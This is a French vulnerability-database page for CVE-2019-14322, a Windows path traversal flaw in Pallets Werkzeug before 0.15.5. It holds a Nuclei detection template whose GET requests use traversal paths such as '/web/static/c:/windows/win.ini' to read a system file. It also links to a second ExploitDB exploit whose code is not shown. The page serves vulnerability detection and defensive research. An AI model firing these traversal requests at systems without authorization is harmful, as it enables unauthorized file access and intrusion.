Aller au contenu
Appaloosa Scout
Sélection de la langue
fr en

Exploit matérialisé

CVE-2019-14322

HIGH

2 exploit(s) public(s) pour cette CVE, 1 matérialisé(s) avec leur code.

À des fins de recherche défensive uniquement. Ne testez que sur des systèmes que vous possédez ou pour lesquels vous détenez une autorisation écrite. L'accès non autorisé est illégal.
Nuclei high Vérifié
Source

Pallets Werkzeug <0.15.5 - Local File Inclusion

Par projectdiscovery

Comment tester cet exploit

Le template Nuclei EST le test : une règle de détection exécutable. Installez nuclei, puis lancez-le contre une cible que vous contrôlez.

nuclei -id CVE-2019-14322 -u https://your-target

Template yaml

id: CVE-2019-14322

info:
  name: Pallets Werkzeug <0.15.5 - Local File Inclusion
  author: madrobot
  severity: high
  description: |
    Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.
  impact: |
    The LFI vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
  remediation: |
    Upgrade Pallets Werkzeug to version 0.15.5 or above to mitigate the LFI vulnerability.
  reference:
    - https://palletsprojects.com/blog/werkzeug-0-15-5-released/
    - http://packetstormsecurity.com/files/163398/Pallets-Werkzeug-0.15.4-Path-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14322
    - https://github.com/faisalfs10x/CVE-2019-14322-scanner
    - https://github.com/sobinge/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-14322
    cwe-id: CWE-22
    epss-score: 0.55803
    epss-percentile: 0.98968
    cpe: cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: microsoft
    product: windows
    shodan-query: cpe:"cpe:2.3:o:microsoft:windows"
  tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects,microsoft,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/base_import/static/c:/windows/win.ini"
      - "{{BaseURL}}/web/static/c:/windows/win.ini"
      - "{{BaseURL}}/base/static/c:/windows/win.ini"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402204388426cb3911a2b145aef3418e87b5d87a301e25ab7116f41d316b184546bbc0220135b9eae8575fabf739e50bf655697afca41b468b08b1d16c70dea0d26c75062:922c64590222798bb761d5b6d8e72950
ExploitDB webapps python
Source

Pallets Werkzeug 0.15.4 - Path Traversal

Par faisalfs10x

Comment tester cet exploit

Exploit web. Déployez une instance vulnérable en lab, servez le script/la requête contre elle et observez la réponse.

python3 50101.py

Code

Contenu pas encore matérialisé (récupéré au prochain cycle).

Voir à la source